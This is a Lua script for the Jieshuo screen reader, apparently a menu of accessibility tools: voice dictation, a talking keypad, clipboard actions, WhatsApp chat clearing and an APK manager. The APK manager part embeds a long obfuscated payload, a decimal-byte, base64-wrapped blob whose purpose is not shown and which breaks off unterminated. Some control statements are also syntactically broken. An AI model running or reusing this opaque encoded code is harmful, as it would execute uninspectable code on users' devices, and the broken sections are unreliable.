require "import"
import "com.androlua.*"
import "android.widget.*"
layout = {GridView,
id = "grid",
numColumns = 5,
layout_width = "fill",
layout_height = "fill"}
items = {"voice input", "clipboard history", "copy", "accessible keypad 0", "clear all chat in WhatsApp", "APK manager"}
dlg = LuaDialog(this)
dlg.View = loadlayout(layout)
grid.adapter = SingleLineAdapter(service, String(items))
dlg.setTitle("all in 1")
.setMessage("this tool is developed by technical blind")
.setButton("Exit", nil)
dlg.show()
grid.onItemClick = function(l, v)
dlg.dismiss()
task(300, function()
if v.text == "voice input" then
require "import"
import "android.content.Context"
import "android.content.Intent"
import "java.util.Locale"

import "android.speech.SpeechRecognizer"
import "android.speech.RecognitionListener"
import "android.speech.RecognizerIntent"
import "java.util.Locale"
import "android.content.Intent"

local substitutionTable = {
    ["chino"] = "Jieshuo"
}

function capitalizeFirstWord(text)
    local firstChar = text:sub(1, 1)
    local restOfString = text:sub(2)
    return firstChar:upper() .. restOfString
end

function substituteWords(text)
    for word, substitution in pairs(substitutionTable) do
        text = text:gsub("%f[%a]" .. word .. "%f[%A]", substitution)
    end
    return text
end

function capitalizeAfterPeriod(text)
    return text:gsub("(%.[%s]*%a)", function(match)
        local char = match:sub(-1)
        local capitalizedChar = char:upper()
        return match:sub(1, -2) .. capitalizedChar
    end)
end

function lowercaseAfterComma(text)
    return text:gsub("(%,[%s]*%a)", function(match)
        local char = match:sub(-1)
        local lowercaseChar = char:lower()
        return match:sub(1, -2) .. lowercaseChar
    end)
end

function addPunctuation(text)
    local lastChar = text:sub(-1)
    local punctuation = { "।", "!", "?" }
    local hasPunctuation = false

    for _, p in ipairs(punctuation) do
        if lastChar == p then
            hasPunctuation = true
            break
        end
    end

    if not hasPunctuation then
        text = text .. "।"
    end

    return text
end

function hasInternetConnection()
    local connectivityManager = this.getSystemService(Context.CONNECTIVITY_SERVICE)
    local networkInfo = connectivityManager.getActiveNetworkInfo()
    return networkInfo ~= nil and networkInfo.isConnected()
end

function kill()
    speechRecognizer.destroy()
    speechRecognizer = nil
    return true
end

function startListening()
    if not hasInternetConnection() then
        service.asyncSpeak("No internet connection. Voice recognition is not available.")
        return false
    end
    
    local verbalizationDetected = false
    
    speechRecognizer = SpeechRecognizer.createSpeechRecognizer(this)
    speechListener = RecognitionListener{
        onResults = function(results)
            data = results.getParcelableArrayList(SpeechRecognizer.RESULTS_RECOGNITION)
            if data ~= nil and data.size() > 0 then
                verbalizationDetected = true
                local recognizedText = data.get(0)
                recognizedText = capitalizeFirstWord(recognizedText)
                recognizedText = substituteWords(recognizedText)
                recognizedText = capitalizeAfterPeriod(recognizedText)
                recognizedText = lowercaseAfterComma(recognizedText)
                recognizedText = addPunctuation(recognizedText)

                -- Punctuation markers
                recognizedText = string.gsub(recognizedText, "(%s?)comma(%s?)([%p]*)$", "%2,%3")
                recognizedText = string.gsub(recognizedText, "(%s?)period(%s?)([%p]*)$", "%2.%3")
                recognizedText = string.gsub(recognizedText, "(%s?)question mark(%s?)([%p]*)$", "%2?")
                recognizedText = string.gsub(recognizedText, "(%s?)colon(%s?)([%p]*)$", "%2:")
                recognizedText = string.gsub(recognizedText, "(%s?)quotation marks(%s?)([%p]*)$", "%2\"")

                -- Emoji markers
                recognizedText = string.gsub(recognizedText, "(%s?)winking face(%s?)", "%1\u{1F609}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)smiling face with big eyes(%s?)", "%1\u{1F603}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)crying face(%s?)", "%1\u{1F622}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)face screaming in fear(%s?)", "%1\u{1F631}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)angry face(%s?)", "%1\u{1F621}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)smiling face with halo(%s?)", "%1\u{1F60F}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)disappointed face(%s?)", "%1\u{1F61E}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)smiling face with cold sweat(%s?)", "%1\u{1F605}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)face throwing a kiss(%s?)", "%1\u{1F61A}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)face with hand over mouth(%s?)", "%1\u{1F64A}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)relieved face(%s?)", "%1\u{1F60C}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)smiling face(%s?)", "%1\u{1F600}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)face savoring food(%s?)", "%1\u{1F60B}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)smiling face with smiling eyes(%s?)", "%1\u{1F606}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)thumbs up(%s?)", "%1\u{1F44C}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)neutral face(%s?)", "%1\u{1F610}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)confused face(%s?)", "%1\u{1F615}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)clapping hands(%s?)", "%1\u{1F44F}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)rolling on the floor laughing(%s?)", "%1\u{1F923}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)smiling face with smiling eyes(%s?)", "%1\u{1F60A}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)happy face with smiling eyes(%s?)", "%1\u{1F60A}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)fire emoji(%s?)", "%1\u{1F525}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)poop with eyes(%s?)", "%1\u{1F4A9}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)smiling face with hearts(%s?)", "%1\u{1F60D}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)face with tongue out(%s?)", "%1\u{1F61C}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)face sticking out tongue(%s?)", "%1\u{1F61C}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)red heart(%s?)", "%1\u{2764}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)blue heart(%s?)", "%1\u{1F499}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)green heart(%s?)", "%1\u{1F49A}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)black heart(%s?)", "%1\u{1F5A4}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)face with rolling eyes(%s?)", "%1\u{1F644}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)face tears of joy(%s?)", "%1\u{1F602}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)thumbs up(%s?)", "%1\u{1F44D}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)thumbs down(%s?)", "%1\u{1F44E}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)face with open mouth(%s?)", "%1\u{1F62E}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)angry face(%s?)", "%1\u{1F620}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)folded hands(%s?)", "%1\u{1F64F}%2")
                recognizedText = string.gsub(recognizedText, "(%s?)face with sunglasses(%s?)", "%1\u{1F60E}%2")

                service.getEditText()
                local node = service.getEditText()
                service.insertText(node, recognizedText .. " ")
                service.speak(recognizedText)
            end

            if not verbalizationDetected then
                kill()
                return false
            end
        end,
        onError = function()
            kill()
            return false
        end
    }

    recognizerIntent = Intent(RecognizerIntent.ACTION_RECOGNIZE_SPEECH)
    recognizerIntent.putExtra(RecognizerIntent.EXTRA_LANGUAGE_MODEL, RecognizerIntent.LANGUAGE_MODEL_FREE_FORM)
    recognizerIntent.putExtra(RecognizerIntent.EXTRA_LANGUAGE, "BN_IN")
    recognizerIntent.putExtra(RecognizerIntent.EXTRA_CALLING_PACKAGE, this.getPackageName())
    speechRecognizer.startListening(recognizerIntent)
    speechRecognizer.setRecognitionListener(speechListener)

    return true
end

startListening()
return true
elseif v.text == "clipboard history" then
if service.execute("Clipboard history")
return true
end
elseif v.text == "copy" then
if service.execute("Copy")
return true
end
elseif v.text == "accessible keypad 0" then
require "import"
import "android.widget.*"
import "android.view.*"
import "android.app.*"
import "android.os.*"
import "android.graphics.Color"
import "android.content.Intent"
import "android.net.Uri"
import "android.content.Context"
import "android.media.MediaPlayer"
import "java.io.File"

activity.setTitle("Number Pad Keyboard")
activity.setTheme(android.R.style.Theme_Material_Light)

layout = LinearLayout()
layout.setOrientation(LinearLayout.VERTICAL)
layout.setPadding(20, 20, 20, 20)
layout.setBackgroundColor(Color.WHITE)

inputText = ""

displayLayout = LinearLayout()
displayLayout.setOrientation(LinearLayout.VERTICAL)
displayLayout.setLayoutParams(LinearLayout.LayoutParams(LinearLayout.LayoutParams.MATCH_PARENT, LinearLayout.LayoutParams.WRAP_CONTENT))
displayLayout.setPadding(10, 10, 10, 30)

textDisplay = TextView()
textDisplay.setLayoutParams(LinearLayout.LayoutParams(LinearLayout.LayoutParams.MATCH_PARENT, LinearLayout.LayoutParams.WRAP_CONTENT))
textDisplay.setText("")
textDisplay.setTextSize(24)
textDisplay.setTextColor(Color.BLACK)
textDisplay.setGravity(Gravity.CENTER)
displayLayout.addView(textDisplay)

layout.addView(displayLayout)

numpadLayout = LinearLayout()
numpadLayout.setOrientation(LinearLayout.VERTICAL)
numpadLayout.setLayoutParams(LinearLayout.LayoutParams(LinearLayout.LayoutParams.MATCH_PARENT, LinearLayout.LayoutParams.WRAP_CONTENT))
numpadLayout.setGravity(Gravity.CENTER)

function getAppDirectory()
  return activity.getLuaDir()
end

function createAudioFolder()
  local folderPath = getAppDirectory() .. "/audio"
  local folder = File(folderPath)
  
  if not folder.exists() then
    folder.mkdirs()
  end
  
  return folderPath
end

function playButtonAudio(buttonName)
  local mediaPlayer = MediaPlayer()
  local folderPath = createAudioFolder()
  local audioFilePath = folderPath .. "/" .. buttonName .. ".mp3"
  local audioFile = File(audioFilePath)

  if audioFile.exists() then
    xpcall(function()
      mediaPlayer.setDataSource(audioFilePath)
      mediaPlayer.prepare()
      mediaPlayer.start()
      mediaPlayer.setOnCompletionListener{
        onCompletion = function(mp)
          mp.release()
        end
      }
    end, function(err)
      Toast.makeText(activity, "آڈیو پلے نہیں ہو سکی: " .. tostring(err), Toast.LENGTH_SHORT).show()
      mediaPlayer.release()
    end)
  else
    Toast.makeText(activity, "آڈیو فائل نہیں ملی: " .. buttonName .. ".mp3", Toast.LENGTH_SHORT).show()
  end
end

function showDeleteNotification(deletedChar)
  local displayText = deletedChar

  if deletedChar == "*" then
    displayText = "ASTERISK"
  elseif deletedChar == "#" then
    displayText = "HASH"
  end

  Toast.makeText(activity, displayText .. " Deleted Successfully", Toast.LENGTH_SHORT).show()
end

function createRow(numbers)
  local row = LinearLayout()
  row.setOrientation(LinearLayout.HORIZONTAL)
  row.setLayoutParams(LinearLayout.LayoutParams(LinearLayout.LayoutParams.MATCH_PARENT, LinearLayout.LayoutParams.WRAP_CONTENT))
  row.setGravity(Gravity.CENTER)
  
  for i, num in ipairs(numbers) do
    local button = Button(activity)
    
    if num == "*" then
      button.setText("ASTERISK")
    elseif num == "#" then
      button.setText("HASH")
    else
      button.setText(num)
    end
    
    button.setTextSize(22)
    local params = LinearLayout.LayoutParams(150, 150)
    params.setMargins(10, 10, 10, 10)
    button.setLayoutParams(params)
    
    if num == "Delete" then
      button.setOnClickListener{
        onClick = function()
          if #inputText > 0 then
            local deletedChar = string.sub(inputText, -1)
            inputText = string.sub(inputText, 1, -2)
            textDisplay.setText(inputText)
            showDeleteNotification(deletedChar)
          end
        end
      }
    elseif num == "Call" then
      button.setOnClickListener{
        onClick = function()
          makeDirectCall()
          playButtonAudio("CALL")
        end
      }
    elseif num == "*" then
      button.setOnClickListener{
        onClick = function()
          inputText = inputText .. num
          textDisplay.setText(inputText)
          playButtonAudio("ASTERISK")
        end
      }
    else
      button.setOnClickListener{
        onClick = function()
          inputText = inputText .. num
          textDisplay.setText(inputText)
          playButtonAudio(num)
        end
      }
    end
    
    row.addView(button)
  end
  
  return row
end

numpadLayout.addView(createRow({"1", "2", "3"}))
numpadLayout.addView(createRow({"4", "5", "6"}))
numpadLayout.addView(createRow({"7", "8", "9"}))
numpadLayout.addView(createRow({"*", "0", "#"}))
numpadLayout.addView(createRow({"Call", "Delete"}))

layout.addView(numpadLayout)

function checkPermission()
  if Build.VERSION.SDK_INT >= 23 then
    local permissions = {
      "android.permission.READ_EXTERNAL_STORAGE",
      "android.permission.WRITE_EXTERNAL_STORAGE",
      "android.permission.CALL_PHONE"
    }
    activity.requestPermissions(permissions, 1)
  end
end

checkPermission()

createAudioFolder()

activity.setContentView(layout)

function makeDirectCall()
  if #inputText > 0 then
    local intent = Intent(Intent.ACTION_CALL)
    intent.setData(Uri.parse("tel:" .. inputText))
    
    xpcall(function()
      activity.startActivity(intent)
      playButtonAudio("CALL")
    end, function(err)
      Toast.makeText(activity, "کال نہیں ہو سکی: " .. tostring(err), Toast.LENGTH_LONG).show()
    end)
  else
    Toast.makeText(activity, "براہ کرم پہلے نمبر درج کریں", Toast.LENGTH_SHORT).show()
  end
end
elseif v.text == "clear all chat in WhatsApp" then
if service.click({
{"More options$01",
"More$01",
"Clear chat$01",
"Clear chat$01",
}
})
return true
end
elseif v.text == "APK manager" then
strings = {["Error extracting APK file: "] = "Error extracting APK file: ",
["APK file extracted successfully, the APK file is saved at:\\n"] = "APK file extracted successfully, the APK file is saved at:\\n",
["Search apps"] = "Search apps",
["Exit"] = "Exit",
["About"] = "About",
["Join Jieshuo resources hub, a channel dedicated to sharing materials about Jieshuo, such as extensions, tools, and more."] = "Join Jieshuo resources hub, a channel dedicated to sharing materials about Jieshuo, such as extensions, tools, and more.",
["Join Telegram Channel"] = "Join Telegram Channel",
["Join Facebook group"] = "Join facebook group",
["Join Jieshuo resources hub on facebook, a group dedicated to sharing materials about Jieshuo, such as extensions, tools, and more."] = "Join Jieshuo resources hub on facebook, a group dedicated to sharing materials about Jieshuo, such as extensions, tools, and more.",
["Join Jieshuo Materials Hub. A channel that provides jieshuo materials, extensions, tools, and more"] = "Join Jieshuo Materials Hub. A channel that provides jieshuo materials, extensions, tools, and more",
["Join TechVisionary to get great add-ons for Jieshuo and much more"] = "Join TechVisionary to get great add-ons for Jieshuo and much more",
["Join tiện ích, chức năng và công cụ jieshuo channel for more extensions and tools for jieshuo"] = "Join tiện ích, chức năng và công cụ jieshuo channel for more extensions and tools for jieshuo",
["Go back"] = "Go back",
["Applications Manager"] = "Applications Manager",
["All apps"] = "All apps",
["Installed apps"] = "Installed apps",
["System apps"] = "System apps",
["Could not open the application."] = "Could not open the application.",
["Unable to open activity: "] = "Unable to open activity: ",
["Extract audio"] = "Extract audio",
["Error extracting audio files: "] = "Error extracting audio files: ",
["No audio files found in this application"] = "No audio files found in this application",
["Found "] = "Found ",
[" audio files. Tap to preview, long press to select for download."] = " audio files. Tap to preview, long press to select for download.",
["Error playing audio file: "] = "Error playing audio file: ",
["Error saving file "] = "Error saving file ",
["Successfully saved "] = "Successfully saved ",
[" audio files to "] = " audio files to ",
["No files selected for download"] = "No files selected for download",
["Download Selected"] = "Download Selected",
["Select All"] = "Select All",
["Deselect All"] = "Deselect All",
["Extract APK"] = "Extract APK",
["Error when extracting the APK file"] = "Error when extracting the APK file",
["Share"] = "Share",
["APK file not found!"] = "APK file not found!",
["Error extracting the application for sharing."] = "Error extracting the application for sharing.",
["App info"] = "App info",
["Uninstall"] = "Uninstall",
["Open in Play Store"] = "Open in Play Store",
["Copy Play Store link"] = "Copy Play Store link",
["Play Store link copied to clipboard"] = "Play Store link copied to clipboard",
["Share app link"] = "Share app link",
["Download the app here: "] = "Download the app here: ",
["Share via"] = "Share via",
["Get package name"] = "Get package name",
["Copy"] = "Copy",
["Package name copied to clipboard."] = "Package name copied to clipboard.",
["Share package name"] = "Share package name",
["Back"] = "Back",
["Package Name"] = "Package Name",
["Show activities"] = "Show activities",
["No activities found in this application."] = "No activities found in this application.",
["List of activities for: "] = "List of activities for: ",
["Copy activity code"] = "Copy activity code",
["Code copied to clipboard. You can paste it in your script."] = "Code copied to clipboard. You can paste it in your script.",
["Share activity code"] = "Share activity code",
["Share activity info & code"] = "Share activity info & code",
["Cancel"] = "Cancel",
["Action for activity: "] = "Action for activity: ",
["Options for: "] = "Options for: ",
["Selected, "] = "Selected, ",
["Add to favorites"] = "Add to favorites",
["Remove from favorites"] = "Remove from favorites",
["Favorites apps"] = "Favorites apps",
["Added to favorites"] = "Added to favorites",
["Removed from favorites"] = "Removed from favorites",}
if not _G.enc then
_G.enc={}
function _G.enc.e(data)
local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
return((data:gsub('.',function(x)
local r,bytes='',x:byte()
for i=8,1,-1 do
r=r ..(bytes % 2^i-bytes % 2^(i-1)>0 and '1' or '0')
end
return r;
end)..'0000'):gsub('%d%d%d?%d?%d?%d?',function(x)
if(#x<6)then return '' end
local c=0
for i=1,6 do
c=c+(x:sub(i,i)=='1' and 2^(6-i)or 0)
end
return b:sub(c+1,c+1)
end)..({'','==','='})[#data % 3+1])
end
function _G.enc.d(data)
local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
data=data:gsub('[^'..b..'=]','')
return(data:gsub('.',function(x)
if(x=='=')then return '' end
local r,f='',(b:find(x)-1)
for i=6,1,-1 do
r=r ..(f % 2^i-f % 2^(i-1)>0 and '1' or '0')
end
return r;
end):gsub('%d%d%d%d%d%d%d%d',function(x)
local c=0
for i=1,8 do
c=c+(x:sub(i,i)=='1' and 2^(8-i)or 0)
end
return string.char(c)
end))
end
end
local process=_G.enc
encodedCode="61 73 68 111 54 90 83 86 77 102 81 77 105 68 98 101 67 65 48 52 51 75 105 88 121 105 115 65 51 105 67 101 79 116 107 112 81 112 75 88 122 77 83 54 111 76 90 80 72 66 86 85 85 66 67 69 72 89 111 68 81 79 75 115 117 116 119 69 102 87 69 110 100 113 67 69 112 52 117 103 105 52 72 71 108 89 100 83 69 66 101 74 107 74 117 66 71 104 122 88 108 88 81 70 80 100 81 108 72 53 67 114 73 75 75 52 83 47 56 43 69 56 69 47 102 81 103 121 102 108 55 99 88 80 103 105 97 111 107 108 108 114 54 107 121 115 87 51 107 67 78 74 120 109 82 111 108 88 84 112 121 72 65 83 99 104 66 66 66 69 70 108 75 52 53 108 73 54 112 112 73 84 108 86 71 76 122 70 55 87 75 113 100 43 47 119 89 82 110 113 51 105 119 103 82 106 74 108 117 57 56 100 101 80 75 99 109 119 51 65 84 109 53 53 70 99 50 120 43 73 68 102 109 103 89 79 82 57 54 56 76 52 47 89 107 115 89 99 88 108 52 79 100 106 84 77 109 75 71 104 103 53 99 102 83 52 66 79 72 65 77 65 105 87 104 112 65 72 106 107 109 121 77 101 116 119 66 56 56 100 106 80 84 98 100 52 83 69 81 68 72 89 57 72 102 111 112 113 119 67 48 103 106 119 98 115 90 122 107 113 68 99 106 121 79 83 101 101 56 100 119 81 106 53 100 71 83 120 87 80 89 86 72 107 120 119 113 73 68 97 43 66 113 81 57 68 65 117 88 108 120 90 65 111 52 100 111 78 76 70 110 101 57 65 66 103 99 104 55 54 120 116 71 105 78 111 99 50 51 79 116 114 119 69 115 76 54 109 112 65 106 80 90 43 90 67 110 73 78 82 82 53 70 99 117 122 110 114 117 52 111 122 52 85 43 102 75 105 103 121 69 66 101 49 110 68 83 121 84 52 109 109 98 113 88 68 115 72 119 50 97 122 70 49 108 43 112 106 97 51 73 89 55 89 50 75 81 53 109 89 121 103 116 66 108 80 98 106 70 73 99 54 107 51 77 78 49 52 98 77 83 81 98 121 119 85 115 116 104 99 77 49 99 102 83 97 98 48 108 53 99 80 100 110 65 55 73 104 101 70 117 104 105 83 53 85 108 51 80 53 55 54 55 48 87 113 49 113 120 89 103 57 51 99 118 112 43 120 70 77 55 55 99 99 101 65 78 100 67 106 51 89 56 65 65 86 70 102 106 74 113 80 106 121 119 70 113 80 107 85 57 81 75 106 109 106 114 84 121 113 88 81 110 75 66 73 108 106 122 113 67 56 80 104 103 87 111 74 71 106 116 67 83 71 110 80 110 55 77 121 48 70 55 107 49 114 83 119 103 106 114 122 85 106 85 57 102 121 73 70 113 115 107 75 74 67 120 66 88 120 102 116 47 78 110 86 80 103 89 115 104 73 69 108 67 66 103 83 54 85 79 52 74 97 101 97 54 100 87 73 114 72 68 74 70 52 57 73 122 82 122 117 90 121 69 111 83 56 113 108 90 103 53 109 111 54 49 109 68 111 84 80 74 109 57 83 48 81 51 105 77 111 109 68 79 84 79 74 48 100 97 72 115 69 108 112 109 105 74 47 89 48 88 66 97 85 67 97 81 57 49 107 83 83 79 87 88 108 52 86 70 118 85 113 43 102 80 85 80 55 49 56 115 85 107 119 78 68 53 73 57 104 105 89 109 75 81 120 67 78 86 109 111 104 81 69 72 102 56 67 115 48 73 69 51 102 103 118 54 56 121 73 113 70 78 80 82 70 82 116 99 121 119 52 104 89 77 112 73 67 89 51 70 66 71 49 89 69 97 71 66 83 100 105 87 86 107 67 86 90 99 66 106 121 48 55 87 49 107 47 74 89 83 76 106 101 80 113 104 71 76 116 66 52 56 76 67 121 71 112 65 111 87 102 47 70 81 51 65 103 85 70 101 71 116 87 119 98 114 98 73 100 70 119 73 86 122 77 89 98 82 109 119 113 99 47 119 78 103 111 80 115 90 119 106 103 71 100 90 115 82 105 69 108 71 57 118 76 65 103 109 81 87 99 108 105 52 53 67 70 49 77 43 101 100 43 77 77 118 79 81 121 105 87 115 87 77 75 54 73 80 84 121 88 110 69 111 69 74 73 55 110 75 121 74 48 66 80 105 53 98 112 68 76 86 69 55 50 52 79 110 66 67 105 75 114 90 48 97 67 69 115 88 98 70 75 104 97 114 108 85 105 108 71 78 72 109 120 65 74 75 54 69 70 106 70 112 97 107 66 97 69 49 107 89 99 118 73 54 112 70 51 66 98 75 119 76 70 67 115 56 83 110 54 73 116 65 110 82 55 66 82 103 84 53 75 122 80 106 75 110 71 56 112 49 75 90 54 87 67 103 116 68 89 109 122 73 108 66 102 110 119 71 114 50 78 73 112 85 68 72 112 104 116 109 113 120 72 102 65 89 86 104 54 66 70 98 81 78 118 90 77 113 109 79 106 75 85 86 70 85 86 104 69 118 78 111 50 54 109 54 82 67 115 116 67 113 67 65 67 106 113 114 52 70 99 82 100 98 66 83 108 105 88 103 119 86 68 101 105 80 75 69 83 97 109 85 66 65 67 81 48 101 106 55 87 109 68 54 104 116 55 119 54 78 114 114 77 115 70 118 70 83 114 81 114 66 79 100 111 105 50 108 87 57 71 56 118 115 113 113 53 75 72 98 110 105 70 74 80 100 47 111 75 105 111 81 69 107 103 75 82 109 66 109 66 112 49 84 67 78 114 114 107 71 77 69 81 70 99 98 89 65 51 70 106 75 109 104 76 119 78 67 54 75 112 101 102 103 103 104 66 101 88 108 89 89 122 112 68 84 70 43 86 115 75 87 122 74 106 87 81 76 56 43 89 87 54 87 83 116 66 55 79 79 89 104 78 113 55 85 108 112 47 107 74 82 75 114 43 82 82 85 67 71 106 111 50 109 115 53 69 71 72 119 106 122 114 71 81 76 74 120 71 117 117 89 55 79 89 87 53 69 107 113 68 119 50 70 69 74 105 111 78 120 99 49 121 104 108 117 106 82 43 99 105 110 71 89 53 88 71 84 66 117 104 80 68 115 109 78 43 84 98 97 55 50 85 83 117 69 74 90 97 48 104 103 78 112 99 66 81 89 85 86 88 97 122 115 101 104 90 107 65 76 121 97 74 105 109 47 107 103 49 79 119 89 55 57 81 55 89 87 101 101 117 81 112 75 89 97 71 98 103 113 66 111 56 105 77 52 78 83 97 121 79 77 77 110 55 98 87 99 67 111 79 74 82 105 72 118 105 104 118 112 52 66 97 65 76 111 114 54 51 67 84 118 119 105 48 109 88 118 83 78 98 81 80 68 111 72 112 86 65 99 122 101 69 69 97 71 102 75 122 82 57 104 100 69 90 99 109 99 82 78 86 103 78 90 67 98 57 49 120 50 112 112 49 86 75 73 80 76 79 86 115 75 78 57 87 68 67 110 99 52 112 75 73 119 73 108 85 114 90 104 107 120 90 71 111 43 107 84 43 43 66 53 113 90 82 104 114 73 107 111 72 102 84 68 69 104 98 99 87 111 107 53 81 51 77 70 52 73 88 67 74 73 89 77 57 79 105 81 105 108 106 85 106 112 103 84 68 81 113 107 84 79 121 85 98 114 106 71 110 72 71 75 90 119 106 107 54 66 120 47 77 51 70 116 82 74 121 116 117 99 90 75 114 52 77 107 99 54 102 85 65 118 55 97 80 116 78 80 106 76 74 116 85 97 89 117 117 76 73 122 87 71 115 52 47 78 99 98 85 81 116 81 70 103 106 57 73 99 69 70 111 118 83 86 119 122 110 68 55 82 56 112 104 54 89 112 74 54 110 107 83 48 101 75 82 89 88 90 102 115 85 104 120 74 55 119 67 79 73 101 71 111 73 118 97 65 118 79 83 103 49 83 107 53 65 69 104 53 99 53 81 82 57 110 77 47 90 70 112 67 69 70 85 85 85 81 99 101 79 87 65 71 82 107 106 106 117 119 71 83 73 75 79 119 112 71 83 121 122 50 104 53 70 65 111 68 106 89 122 66 113 51 111 84 57 43 65 56 97 108 102 72 50 118 113 103 121 56 57 71 107 121 85 109 103 56 88 114 74 83 77 113 65 73 73 121 115 120 111 89 101 72 104 70 89 121 90 69 66 67 74 68 76 47 98 81 83 87 85 101 75 106 69 48 112 90 79 43 104 82 109 107 98 118 116 83 57 53 48 89 48 87 83 43 71 51 101 85 86 111 99 67 86 69 82 115 84 67 68 49 48 83 87 77 108 66 48 72 106 110 47 54 67 107 53 107 67 117 70 81 109 119 110 97 50 119 72 86 108 99 71 103 52 43 48 80 75 105 79 111 85 90 116 113 73 87 72 52 117 68 73 71 70 74 65 111 109 83 85 101 77 105 111 81 50 43 107 103 101 48 99 56 104 71 68 49 85 97 118 122 79 71 90 48 77 111 57 73 89 113 86 67 47 98 89 70 68 78 54 48 97 111 78 105 50 86 113 117 56 105 53 87 122 89 115 75 50 112 88 103 65 97 88 102 87 119 72 48 100 111 86 47 113 88 83 72 53 87 77 103 104 98 115 71 79 47 78 89 113 121 107 97 77 108 111 115 90 90 81 48 115 85 101 90 51 107 104 110 76 119 99 49 67 106 104 75 112 117 120 79 122 107 76 73 97 105 98 99 121 72 73 111 109 52 78 88 51 81 105 83 103 103 106 97 54 76 115 83 69 81 70 116 82 65 108 112 50 111 75 86 80 119 75 53 117 97 65 98 78 54 113 109 80 89 51 111 74 99 72 81 49 113 73 109 82 78 113 89 65 74 121 99 104 106 54 89 75 112 67 121 83 97 121 112 90 77 99 120 53 104 88 109 43 122 110 106 90 66 54 52 117 76 111 105 114 78 78 47 74 74 98 65 86 113 83 113 68 83 57 97 56 116 70 118 78 115 51 78 67 65 73 52 79 111 105 56 74 66 101 79 103 81 114 82 106 49 98 79 104 85 87 54 105 103 120 111 116 87 65 85 105 69 108 119 89 119 111 70 88 82 97 107 65 54 67 51 115 119 87 97 51 110 48 53 104 52 119 75 84 87 73 70 101 108 97 67 77 76 85 69 51 99 120 107 115 115 50 47 117 113 117 103 65 88 78 66 87 109 109 86 114 66 108 106 115 107 106 53 104 55 120 113 107 114 99 122 70 108 84 50 107 105 66 103 85 68 72 104 106 69 51 103 68 77 120 84 101 67 53 79 75 121 110 78 66 75 78 54 87 112 78 53 54 85 114 104 105 105 71 112 69 76 113 99 106 68 74 106 80 107 48 121 77 122 108 74 103 118 77 122 108 97 77 57 67 81 76 98 50 82 113 83 105 120 112 73 69 116 80 48 82 83 73 72 49 79 69 120 84 99 79 78 77 108 71 108 107 99 87 84 72 110 70 99 57 67 102 55 87 89 73 102 52 76 121 107 52 110 99 55 73 112 109 119 67 107 101 79 99 110 65 97 101 105 76 87 55 70 109 114 53 67 54 65 49 77 121 52 52 122 68 114 71 85 104 100 70 99 73 98 55 73 84 122 120 71 72 110 69 122 89 69 111 114 103 113 70 69 87 117 120 119 107 122 80 67 55 83 49 66 97 87 113 120 107 69 57 70 97 121 74 101 51 81 97 120 69 79 53 112 112 119 72 69 52 71 74 71 90 85 100 50 48 53 90 107 116 117 54 111 110 99 122 119 75 50 112 112 106 69 88 99 108 79 104 112 105 77 66 100 74 121 112 122 65 110 122 102 90 105 71 112 69 76 51 74 83 83 104 53 86 69 86 74 72 75 87 84 75 49 47 83 82 100 66 52 69 80 113 71 88 116 77 78 111 106 98 81 119 97 76 105 88 81 68 120 114 48 90 102 87 103 56 101 75 97 69 122 97 103 86 66 118 81 111 54 67 72 114 82 54 48 119 102 56 50 84 118 48 102 104 101 109 89 99 79 53 100 103 49 78 82 79 109 107 75 100 122 50 70 89 80 83 82 78 53 104 79 85 118 76 47 79 52 54 113 90 81 88 104 114 83 51 108 69 100 115 117 73 113 103 73 105 52 109 116 68 106 78 120 120 120 54 98 70 55 67 70 97 80 109 103 57 101 67 57 53 77 67 119 83 68 120 99 81 119 57 111 89 82 80 81 107 104 52 90 72 119 114 116 122 121 67 97 79 89 56 78 75 103 99 77 68 78 122 66 72 82 99 118 78 67 84 107 55 66 90 105 79 50 87 77 108 108 120 75 66 108 57 114 79 82 119 97 70 120 68 100 118 70 69 50 99 115 67 49 49 57 104 117 56 80 84 86 54 102 113 87 70 71 66 72 109 112 77 99 78 104 83 119 69 119 101 86 105 52 103 105 75 69 114 101 118 101 102 97 68 74 97 76 67 81 100 55 54 74 67 76 53 48 122 106 89 122 68 86 120 116 53 77 70 83 49 111 119 99 52 97 88 73 110 101 50 121 75 71 112 68 67 56 83 106 66 117 68 78 76 108 76 48 105 70 90 97 66 78 67 69 56 113 89 51 107 54 81 110 77 76 73 110 115 104 53 98 119 112 70 108 82 110 70 74 76 71 88 84 114 51 68 53 82 56 54 110 101 57 66 87 104 53 86 70 119 52 78 78 90 57 104 120 83 74 112 107 104 118 73 48 78 81 57 101 86 104 87 71 108 106 85 117 105 102 115 74 89 121 87 79 54 86 98 87 115 